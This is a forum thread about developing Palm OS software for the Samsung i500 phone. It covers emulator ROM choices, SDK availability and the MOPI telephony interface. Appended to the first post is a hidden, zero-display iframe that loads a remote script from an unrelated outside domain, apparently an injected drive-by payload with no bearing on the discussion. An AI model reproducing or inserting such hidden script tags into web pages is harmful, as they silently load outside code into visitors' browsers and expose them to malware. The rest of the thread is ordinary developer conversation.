+ Reply to Thread

developing for the i500

It appears that the Palm OS Emulator does not support the i500 (although I was able to download the ROM file). Any suggestions on what would be the closest model to run in the emulator instead?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: developing for the i500

Originally posted by jtownsend
    It appears that the Palm OS Emulator does not support the i500 (although I was able to download the ROM file). Any suggestions on what would be the closest model to run in the emulator instead?
    It really doesn't matter which you use, but I used to use English-only 4.0 ROM from m505 for some of my testing.

SDK?

Rave, Is there a Software Development Kit for the i500?

Re: Re: developing for the i500

Originally posted by rave
    It really doesn't matter which you use, but I used to use English-only 4.0 ROM from m505 for some of my testing.
    Samsung developed all the apps for the i5 emulating the m505?

Maybe that explains the bugs... No offense/ire intended to you Rave, but that seems a little ridiculous - develop and test on/emulating on the platform the apps is to be deployed on.
    I gave up on the free ipod. And where'd my smilies go?

th3_plague

Fully Converged

Re: SDK?

Originally posted by reidme
    Rave, Is there a Software Development Kit for the i500?
    I second that question ?

SDK ?

At least telephony interface ?
    Shimon Shnitzer
    Maker of TAKEphONE for PalmOS
    www.shsh.com

Re: Re: Re: developing for the i500

Originally posted by th3_plague
    Samsung developed all the apps for the i5 emulating the m505?

Maybe that explains the bugs... No offense/ire intended to you Rave, but that seems a little ridiculous - develop and test on/emulating on the platform the apps is to be deployed on.
    We used it initially to familiarize ourself with 4.0 (which is mostly different from 3.5 in its color usage and TelMgr usage). From then on, all development was on real devices.

So we gotta find other reasons for the bugs

Re: Re: SDK?

Originally posted by shimonsh
    I second that question ?

SDK ?

At least telephony interface ?
    I hope I posted this before, but to recap. There is a separate, SDK team being formed (based in the US) and they are close to launching a support forum with all the SDK and FAQs. The R&D team has been providing this team with answers to questions and sample, documentation, drivers, etc.

I don't know their schedule, but hopefully it won't be too long now. For what it's worth, for the device that I'm working on (the next, next generation model) we hope to be able to launch the SDK before the actual device, not the current way of reacting to customer needs. Samsung, as a phone company, is learning about the PDA and Smartphone market and its needs.

The Samsung telephony interface is called MOPI, by the way, and it will be released Real Soon Now. I hope...

Sup

Re: Re: Re: SDK?

... For what it's worth, for the device that I'm working on (the next, next generation model) we hope to be able to launch the SDK before the actual device, not the current way of reacting to customer needs.
    I look forward to the next, next phone. Hope to see it at the next CES show in Jan. and in my hands another year after that!

For now, I'll look forward to the SDK!

Nanotechnology Nerd shadowboxer's Avatar
    Rave,

thanks as always for your useful input into our forum!
    dale1
    my story in phones....
    i300-->i330-->i500-->sprintt650-->ppc6700-->gsmt650-->HTC Universal-->gsmt650-->8525-->back again to my trusty t650

Re: Re: Re: SDK?

I hope I posted this before, but to recap. There is a separate, SDK team being formed (based in the US) and they are close to launching a support forum with all the SDK and FAQs.
    Rave,

Thanks for the reply! Sorry if its a repeat. How can we find out about this forum when it launches? Could you post a link here? Thanks again for keeping us in the know...

Mark

Any updates on the SDK for the i500? thanks!